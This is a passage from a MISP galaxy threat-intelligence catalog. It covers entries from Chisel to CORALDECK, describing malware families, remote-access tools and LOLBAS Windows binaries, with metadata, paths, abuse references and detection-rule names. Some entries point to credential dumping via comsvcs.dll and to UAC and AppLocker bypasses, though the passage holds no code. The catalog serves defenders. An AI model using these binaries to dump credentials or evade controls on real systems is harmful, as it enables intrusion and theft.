UUID bd2b2375-4f16-42b2-a862-959b5b41c2af which can be used as unique global reference for Chisel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5063 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Chocolatey
Chocolatey is a command-line package manager for Microsoft Windows.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 7a2b00ef-8a37-4901-bf0c-17da0ebf3d69 which can be used as unique global reference for Chocolatey in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5028 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
CHOPSTICK
CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [FireEye APT28] [ESET Sednit Part 2] [FireEye APT28 January 2017] [DOJ GRU Indictment Jul 2018] It is tracked separately from the X-Agent for Android.
Internal MISP references
UUID 01c6c49a-f7c8-44cd-a377-4dfd358ffeba which can be used as unique global reference for CHOPSTICK in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0023 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Chrommme
Chrommme is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with Gelsemium malware.[ESET Gelsemium June 2021]
Internal MISP references
UUID df77ed2a-f135-4f00-9a5e-79b7a6a2ed14 which can be used as unique global reference for Chrommme in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0667 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Clambling
Clambling is a modular backdoor written in C++ that has been used by Threat Group-3390 since at least 2017.[Trend Micro DRBControl February 2020]
Internal MISP references
UUID 4bac93bd-7e58-4ddb-a205-d99597b9e65e which can be used as unique global reference for Clambling in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0660 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CL_Invocation
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Aero diagnostics script
Author: Oddvar Moe
Paths: * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
Resources:
Detection: * Sigma: proc_creation_win_lolbin_cl_invocation.yml * Sigma: posh_ps_cl_invocation_lolscript.yml[CL_Invocation.ps1 - LOLBAS Project]
Internal MISP references
UUID 4bc36e22-6529-4a4a-a5d2-461f3925c5f3 which can be used as unique global reference for CL_Invocation in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5257 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CL_LoadAssembly
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Paths: * C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Resources: * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Detection: * Sigma: proc_creation_win_lolbas_cl_loadassembly.yml[CL_LoadAssembly.ps1 - LOLBAS Project]
Internal MISP references
UUID cb950179-334d-4bd9-9cfb-87b09d279a3b which can be used as unique global reference for CL_LoadAssembly in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5255 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CL_Mutexverifiers
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Proxy execution with CL_Mutexverifiers.ps1
Author: Oddvar Moe
Paths: * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
Resources: * https://twitter.com/pabraeken/status/995111125447577600
Detection: * Sigma: proc_creation_win_lolbin_cl_mutexverifiers.yml[CL_Mutexverifiers.ps1 - LOLBAS Project]
Internal MISP references
UUID 3c63792a-1184-416e-aa9b-18da72e88327 which can be used as unique global reference for CL_Mutexverifiers in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5256 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Clop
Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.[Mcafee Clop Aug 2019][Cybereason Clop Dec 2020][Unit42 Clop April 2021]
Internal MISP references
UUID 5321aa75-924c-47ae-b97a-b36f023abf2a which can be used as unique global reference for Clop in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0611 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'b15c16f7-b8c7-4962-9acc-a98a39f87b69', 'b18b5401-d88d-4f28-8f50-a884a5e58349', 'ac862a66-a4ec-4285-9a21-b63576a5867d', '5ab5f811-5c7e-4f77-ae90-59d3beb93346', '1b5da77a-bf84-4fba-a6d7-8b3b8f7699e0', 'e401022a-36ac-486d-8503-dd531410a927', '8a77c410-bed9-4376-87bf-5ac84fbc2c9d', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
CloudDuke
CloudDuke is malware that was used by APT29 in 2015. [F-Secure The Dukes] [Securelist Minidionis July 2015]
Internal MISP references
UUID b3dd424b-ee96-449c-aa52-abbc7d4dfb86 which can be used as unique global reference for CloudDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0054 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
cmd
cmd is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. [TechNet Cmd]
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir [TechNet Dir]), deleting files (e.g., del [TechNet Del]), and copying files (e.g., copy [TechNet Copy]).
Internal MISP references
UUID 98d89476-63ec-4baf-b2b3-86c52170f5d8 which can be used as unique global reference for cmd in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0106 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'a968c9f3-c190-488f-bacc-92e8f1ce295c', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cmdkey
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: Oddvar Moe
Paths: * C:\Windows\System32\cmdkey.exe * C:\Windows\SysWOW64\cmdkey.exe
Resources: * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Detection: * Sigma: proc_creation_win_cmdkey_recon.yml[Cmdkey.exe - LOLBAS Project]
Internal MISP references
UUID da252f67-2d4e-419f-b493-d4a1d024a01c which can be used as unique global reference for Cmdkey in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5089 |
| source | Tidal Cyber |
| tags | ['96bff827-e51f-47de-bde6-d2eec0f99767', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
cmdl32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Connection Manager Auto-Download
Author: Elliot Killick
Paths: * C:\Windows\System32\cmdl32.exe * C:\Windows\SysWOW64\cmdl32.exe
Resources: * https://github.com/LOLBAS-Project/LOLBAS/pull/151 * https://twitter.com/ElliotKillick/status/1455897435063074824 * https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/
Detection: * Sigma: proc_creation_win_lolbin_cmdl32.yml * IOC: Reports of downloading from suspicious URLs in %TMP%\config.log * IOC: Useragent Microsoft(R) Connection Manager Vpn File Update[cmdl32.exe - LOLBAS Project]
Internal MISP references
UUID 44a523a8-9ed6-4f01-9a53-0e8ea1e15b51 which can be used as unique global reference for cmdl32 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5090 |
| source | Tidal Cyber |
| tags | ['4c8f8830-0b2c-4c79-b1db-8659ede492f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Cmstp
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Installs or removes a Connection Manager service profile.
Author: Oddvar Moe
Paths: * C:\Windows\System32\cmstp.exe * C:\Windows\SysWOW64\cmstp.exe
Resources: * https://twitter.com/NickTyrer/status/958450014111633408 * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 * https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Detection: * Sigma: proc_creation_win_cmstp_execution_by_creation.yml * Sigma: proc_creation_win_uac_bypass_cmstp.yml * Splunk: cmlua_or_cmstplua_uac_bypass.yml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Elastic: defense_evasion_unusual_process_network_connection.toml * IOC: Execution of cmstp.exe without a VPN use case is suspicious * IOC: DotNet CLR libraries loaded into cmstp.exe * IOC: DotNet CLR Usage Log - cmstp.exe.log[Cmstp.exe - LOLBAS Project]
Internal MISP references
UUID 6f848e15-5234-4445-9a05-2949e4c57f0b which can be used as unique global reference for Cmstp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5091 |
| source | Tidal Cyber |
| tags | ['65938118-2f00-48a1-856e-d1a75a08e3c6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[cobaltstrike manual]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[cobaltstrike manual]
Internal MISP references
UUID 9b6bcbba-3ab4-4a4c-a233-cd12254823f6 which can be used as unique global reference for Cobalt Strike in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0154 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '56d89c06-23a0-4642-adfc-1fffd3524191', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cobalt Strike Random C2 Profile Generator
This is an open-source tool for creating Cobalt Strike Malleable C2 profiles with randomly generated variables.[GitHub random_c2_profile] According to a September 2023 CERT-FR advisory, during an intrusion in March 2023, actors attributed to FIN12 used the tool to generate a Cobalt Strike malleable C2 profile.[CERTFR-2023-CTI-007]
Internal MISP references
UUID cf47b3ce-1392-4904-a4e6-f65aebebddc6 which can be used as unique global reference for Cobalt Strike Random C2 Profile Generator in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5057 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Cobian RAT
Cobian RAT is a backdoor, remote access tool that has been observed since 2016.[Zscaler Cobian Aug 2017]
Internal MISP references
UUID d4e6f9f7-7f4d-47c2-be24-b267d9317303 which can be used as unique global reference for Cobian RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0338 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
code
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VSCode binary, also portable (CLI) version
Author: PfiatDe
Paths: * %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe * C:\Program Files\Microsoft VS Code\Code.exe * C:\Program Files (x86)\Microsoft VS Code\Code.exe
Resources: * https://badoption.eu/blog/2023/01/31/code_c2.html * https://code.visualstudio.com/docs/remote/tunnels * https://code.visualstudio.com/blogs/2022/12/07/remote-even-better
Detection: * IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com * IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe * IOC: File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%.vscode-cli\code_tunnel.json[code.exe - LOLBAS Project]
Internal MISP references
UUID 49d440e4-b2ea-4e7d-8ded-8589ddf679d9 which can be used as unique global reference for code in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5185 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CoinTicker
CoinTicker is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.[CoinTicker 2019]
Internal MISP references
UUID b0d9b31a-072b-4744-8d2f-3a63256a932f which can be used as unique global reference for CoinTicker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0369 |
| source | MITRE |
| type | ['malware'] |
Colorcpl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary that handles color management
Author: Arjan Onwezen
Paths: * C:\Windows\System32\colorcpl.exe * C:\Windows\SysWOW64\colorcpl.exe
Resources: * https://twitter.com/eral4m/status/1480468728324231172
Detection: * Sigma: file_event_win_susp_colorcpl.yml * IOC: colorcpl.exe writing files[Colorcpl.exe - LOLBAS Project]
Internal MISP references
UUID 9f006b88-2f13-4c99-ade0-839da70d1e11 which can be used as unique global reference for Colorcpl in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5092 |
| source | Tidal Cyber |
| tags | ['884eb1b1-aede-4db0-8443-ba50624682e1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Comnie
Comnie is a remote backdoor which has been used in attacks in East Asia. [Palo Alto Comnie]
Internal MISP references
UUID 341fc709-4908-4e41-8df3-554dae6d72b0 which can be used as unique global reference for Comnie in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0244 |
| source | MITRE |
| type | ['malware'] |
ComRAT
ComRAT is a second stage implant suspected of being a descendant of Agent.btz and used by Turla. The first version of ComRAT was identified in 2007, but the tool has undergone substantial development for many years since.[Symantec Waterbug][NorthSec 2015 GData Uroburos Tools][ESET ComRAT May 2020]
Internal MISP references
UUID 300c5997-a486-4a61-8213-93a180c22849 which can be used as unique global reference for ComRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0126 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Comsvcs
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: COM+ Services
Author: LOLBAS Team
Paths: * c:\windows\system32\comsvcs.dll
Resources: * https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Detection: * Sigma: proc_creation_win_rundll32_process_dump_via_comsvcs.yml * Sigma: proc_access_win_lsass_dump_comsvcs_dll.yml * Elastic: credential_access_cmdline_dump_tool.toml * Splunk: dump_lsass_via_comsvcs_dll.yml[Comsvcs.dll - LOLBAS Project]
Internal MISP references
UUID 0448178d-fff1-4174-8339-e6bfca78fb84 which can be used as unique global reference for Comsvcs in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5202 |
| source | Tidal Cyber |
| tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '334b0ee4-5a0d-4634-91c8-236593b818a0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Conficker
Conficker is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.[SANS Conficker] In 2016, a variant of Conficker made its way on computers and removable disk drives belonging to a nuclear power plant.[Conficker Nuclear Power Plant]
Internal MISP references
UUID ef33f1fa-18a3-4b30-b359-17b7930f43a7 which can be used as unique global reference for Conficker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0608 |
| source | MITRE |
| type | ['malware'] |
ConfigSecurityPolicy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: Ialle Teixeira
Paths: * C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Resources: * https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads * https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads * https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor * https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
Detection: * Sigma: proc_creation_win_lolbin_configsecuritypolicy.yml * IOC: ConfigSecurityPolicy storing data into alternate data streams. * IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. * IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"[ConfigSecurityPolicy.exe - LOLBAS Project]
Internal MISP references
UUID 0e178275-4eb7-4fae-a703-d9730adf6a26 which can be used as unique global reference for ConfigSecurityPolicy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5093 |
| source | Tidal Cyber |
| tags | ['d99039e1-e677-4226-8b63-e698d6642535', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Conhost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Console Window host
Author: Wietze Beukema
Paths: * c:\windows\system32\conhost.exe
Resources: * https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ * https://twitter.com/Wietze/status/1511397781159751680 * https://twitter.com/embee_research/status/1559410767564181504 * https://twitter.com/ankit_anubhav/status/1561683123816972288
Detection: * IOC: conhost.exe spawning unexpected processes * Sigma: proc_creation_win_conhost_susp_child_process.yml[Conhost.exe - LOLBAS Project]
Internal MISP references
UUID d3f8a214-3e65-4b7d-aed6-97a3e38ef8e0 which can be used as unique global reference for Conhost in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5094 |
| source | Tidal Cyber |
| tags | ['ea54037d-e07b-42b0-afe6-33576ec36f44', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ConnectWise
ConnectWise is a legitimate remote administration tool that has been used since at least 2016 by threat actors including MuddyWater and GOLD SOUTHFIELD to connect to and conduct lateral movement in target environments.[Anomali Static Kitten February 2021][Trend Micro Muddy Water March 2021]
Internal MISP references
UUID 6f9bb24d-cce2-49de-bedd-1849d9bde7a0 which can be used as unique global reference for ConnectWise in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0591 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Conti
Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using Conti steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.[Cybereason Conti Jan 2021][CarbonBlack Conti July 2020][Cybleinc Conti January 2020]
Internal MISP references
UUID 8e995c29-2759-4aeb-9a0f-bb7cd97b06e5 which can be used as unique global reference for Conti in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0575 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '0ed7d10c-c65b-4174-9edb-446bf301d250', '3d90eed2-862d-4f61-8c8f-0b8da3e45af0', '12a2e20a-7c27-46bb-954d-b372833a9925', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'dea4388a-b1f2-4f2a-9df9-108631d0d078', '24448a05-2337-4bc9-a889-a83f2fd1f3ad', '2743d495-7728-4a75-9e5f-b64854039792', 'd713747c-2d53-487e-9dac-259230f04460', 'fde4c246-7d2d-4d53-938b-44651cf273f1', '964c2590-4b52-48c6-afff-9a6d72e68908', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Control
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to launch controlpanel items in Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\control.exe * C:\Windows\SysWOW64\control.exe
Resources: * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ * https://twitter.com/bohops/status/955659561008017409 * https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
Detection: * Sigma: proc_creation_win_exploit_cve_2021_40444.yml * Sigma: proc_creation_win_rundll32_susp_control_dll_load.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * Elastic: defense_evasion_execution_control_panel_suspicious_args.toml * Elastic: defense_evasion_unusual_dir_ads.toml * IOC: Control.exe executing files from alternate data streams * IOC: Control.exe executing library file without cpl extension * IOC: Suspicious network connections from control.exe[Control.exe - LOLBAS Project]
Internal MISP references
UUID efc46430-b27f-4b05-bc36-1d5eba685ec7 which can be used as unique global reference for Control in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5095 |
| source | Tidal Cyber |
| tags | ['53ac2b35-d302-4bdd-9931-5b6c6cb31b96', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
CookieMiner
CookieMiner is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.[Unit42 CookieMiner Jan 2019]
Internal MISP references
UUID 6e2c4aef-2f69-4507-9ee3-55432d76341e which can be used as unique global reference for CookieMiner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0492 |
| source | MITRE |
| type | ['malware'] |
CORALDECK
CORALDECK is an exfiltration tool used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID f13c8455-d615-4f8d-9d9c-5b31e593cd8a which can be used as unique global reference for CORALDECK in MISP communities and other software using the MISP galaxy
Associated metadata
